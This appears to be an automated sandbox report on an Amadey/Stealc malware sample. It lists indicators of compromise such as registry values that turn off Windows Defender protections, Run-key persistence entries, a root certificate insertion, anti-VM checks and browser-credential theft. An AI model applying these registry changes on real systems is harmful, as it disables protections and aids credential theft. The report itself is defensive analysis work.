amadey | f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	80a506a4b9.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	80a506a4b9.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	80a506a4b9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	80a506a4b9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	80a506a4b9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	80a506a4b9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	80a506a4b9.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	80a506a4b9.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	80a506a4b9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	80a506a4b9.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c39706eca6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f0d7603e98.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cccfebf586.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1fc666ec69.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	80a506a4b9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3178e88ae0.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	1100	powershell.exe
8	2156	powershell.exe
9	3008	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2724	powershell.exe
3008	powershell.exe
1976	powershell.exe
1100	powershell.exe
2156	powershell.exe
2520	powershell.exe
2392	powershell.exe
2228	powershell.exe
1740	powershell.exe
1976	powershell.exe

Downloads MZ/PE file 11 IoCs

flow	pid	Process
29	2004	BitLockerToGo.exe
4	1100	powershell.exe
8	2156	powershell.exe
9	3008	powershell.exe
72	2144	rapes.exe
119	2144	rapes.exe
7	2144	rapes.exe
7	2144	rapes.exe
7	2144	rapes.exe
7	2144	rapes.exe
16	2808	BitLockerToGo.exe

Checks BIOS information in registry 2 TTPs 20 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f0d7603e98.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c39706eca6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1fc666ec69.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3178e88ae0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3178e88ae0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1fc666ec69.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	80a506a4b9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c39706eca6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f0d7603e98.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cccfebf586.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cccfebf586.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	80a506a4b9.exe

Executes dropped EXE 19 IoCs

pid	Process
2852	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE
2144	rapes.exe
1616	ce4pMzk.exe
848	68271cbb99.exe
1464	TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE
1532	483d2fa8a0d53818306efeb32d3.exe
1524	ktxzLhN.exe
1564	dll32.exe
880	3178e88ae0.exe
2916	777e11d160.exe
1700	777e11d160.exe
2292	c39706eca6.exe
1192	f0d7603e98.exe
2692	cccfebf586.exe
2852	1fc666ec69.exe
956	a9c3a998e8.exe
3356	80a506a4b9.exe
3736	ktxzLhN.exe
3828	dll32.exe

Identifies Wine through registry keys 2 TTPs 10 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	3178e88ae0.exe
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	c39706eca6.exe
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	cccfebf586.exe
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	f0d7603e98.exe
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	1fc666ec69.exe
Key opened	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine	80a506a4b9.exe

Loads dropped DLL 44 IoCs

pid	Process
1100	powershell.exe
1100	powershell.exe
2852	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE
2852	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE
2144	rapes.exe
2144	rapes.exe
2156	powershell.exe
2156	powershell.exe
3008	powershell.exe
3008	powershell.exe
2144	rapes.exe
1564	dll32.exe
2144	rapes.exe
2144	rapes.exe
2144	rapes.exe
2916	777e11d160.exe
1492	WerFault.exe
1492	WerFault.exe
1492	WerFault.exe
1492	WerFault.exe
1492	WerFault.exe
340	WerFault.exe
340	WerFault.exe
340	WerFault.exe
340	WerFault.exe
340	WerFault.exe
2144	rapes.exe
2144	rapes.exe
2144	rapes.exe
2144	rapes.exe
2144	rapes.exe
2144	rapes.exe
2896	WerFault.exe
2896	WerFault.exe
2896	WerFault.exe
2144	rapes.exe
2144	rapes.exe
2808	BitLockerToGo.exe
2144	rapes.exe
2144	rapes.exe
2144	rapes.exe
2144	rapes.exe
3828	dll32.exe
2004	BitLockerToGo.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	80a506a4b9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	80a506a4b9.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\cccfebf586.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106970101\\cccfebf586.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\1fc666ec69.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106980101\\1fc666ec69.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\a9c3a998e8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106990101\\a9c3a998e8.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\80a506a4b9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107000101\\80a506a4b9.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\68271cbb99.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106670101\\68271cbb99.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106680121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\pDcYrl4C\\Anubis.exe\""	ce4pMzk.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
12	raw.githubusercontent.com
118	raw.githubusercontent.com
11	raw.githubusercontent.com

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x00050000000186c8-56.dat	autoit_exe
behavioral1/files/0x000600000001a42b-409.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 32 IoCs

discovery

Process Discovery

T1057

pid	Process
2392	tasklist.exe
1508	tasklist.exe
1700	tasklist.exe
1220	tasklist.exe
3644	tasklist.exe
3132	tasklist.exe
2688	tasklist.exe
3132	tasklist.exe
3560	tasklist.exe
2092	tasklist.exe
2676	tasklist.exe
2528	tasklist.exe
2448	tasklist.exe
2976	tasklist.exe
3996	tasklist.exe
2120	tasklist.exe
1660	tasklist.exe
1084	tasklist.exe
3936	tasklist.exe
1176	tasklist.exe
2268	tasklist.exe
2356	tasklist.exe
3508	tasklist.exe
1996	tasklist.exe
3008	tasklist.exe
2468	tasklist.exe
396	tasklist.exe
3304	tasklist.exe
3760	tasklist.exe
3880	tasklist.exe
1040	tasklist.exe
4072	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

pid	Process
2852	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE
2144	rapes.exe
1464	TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE
1532	483d2fa8a0d53818306efeb32d3.exe
880	3178e88ae0.exe
2292	c39706eca6.exe
1192	f0d7603e98.exe
2692	cccfebf586.exe
2852	1fc666ec69.exe
3356	80a506a4b9.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2916 set thread context of 1700	2916	777e11d160.exe	75
PID 880 set thread context of 2808	880	3178e88ae0.exe	78
PID 2292 set thread context of 2004	2292	c39706eca6.exe	88

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
1492	2916	WerFault.exe	74
340	1700	WerFault.exe	75
2896	2692	WerFault.exe	101

System Location Discovery: System Language Discovery 1 TTPs 44 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	80a506a4b9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	68271cbb99.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	777e11d160.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	a9c3a998e8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	a9c3a998e8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	777e11d160.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f0d7603e98.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cccfebf586.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3178e88ae0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c39706eca6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1fc666ec69.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a9c3a998e8.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Delays execution with timeout.exe 33 IoCs

pid	Process
1236	timeout.exe
840	timeout.exe
1404	timeout.exe
3152	timeout.exe
2260	timeout.exe
2192	timeout.exe
344	timeout.exe
3916	timeout.exe
944	timeout.exe
840	timeout.exe
2628	timeout.exe
1504	timeout.exe
3544	timeout.exe
3340	timeout.exe
3680	timeout.exe
3796	timeout.exe
4032	timeout.exe
2016	timeout.exe
2404	timeout.exe
2592	timeout.exe
3972	timeout.exe
2524	timeout.exe
3048	timeout.exe
2696	timeout.exe
3172	timeout.exe
3596	timeout.exe
3208	timeout.exe
1240	timeout.exe
2852	timeout.exe
2568	timeout.exe
580	timeout.exe
880	timeout.exe
2060	timeout.exe

Kills process with taskkill 5 IoCs

pid	Process
2180	taskkill.exe
2156	taskkill.exe
2904	taskkill.exe
2596	taskkill.exe
792	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

defense_evasion spyware trojan

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 3 IoCs

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	cccfebf586.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	cccfebf586.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	cccfebf586.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
840	schtasks.exe
2812	schtasks.exe
2084	schtasks.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
1100	powershell.exe
1100	powershell.exe
1100	powershell.exe
2852	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE
2144	rapes.exe
1616	ce4pMzk.exe
1616	ce4pMzk.exe
1616	ce4pMzk.exe
1616	ce4pMzk.exe
2156	powershell.exe
2156	powershell.exe
2156	powershell.exe
1464	TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE
2392	powershell.exe
2228	powershell.exe
3008	powershell.exe
1976	powershell.exe
1976	powershell.exe
1976	powershell.exe
1740	powershell.exe
2724	powershell.exe
3008	powershell.exe
3008	powershell.exe
1532	483d2fa8a0d53818306efeb32d3.exe
1524	ktxzLhN.exe
1524	ktxzLhN.exe
1564	dll32.exe
880	3178e88ae0.exe
2292	c39706eca6.exe
1192	f0d7603e98.exe
2692	cccfebf586.exe
2852	1fc666ec69.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
3356	80a506a4b9.exe
3356	80a506a4b9.exe
3356	80a506a4b9.exe
3356	80a506a4b9.exe
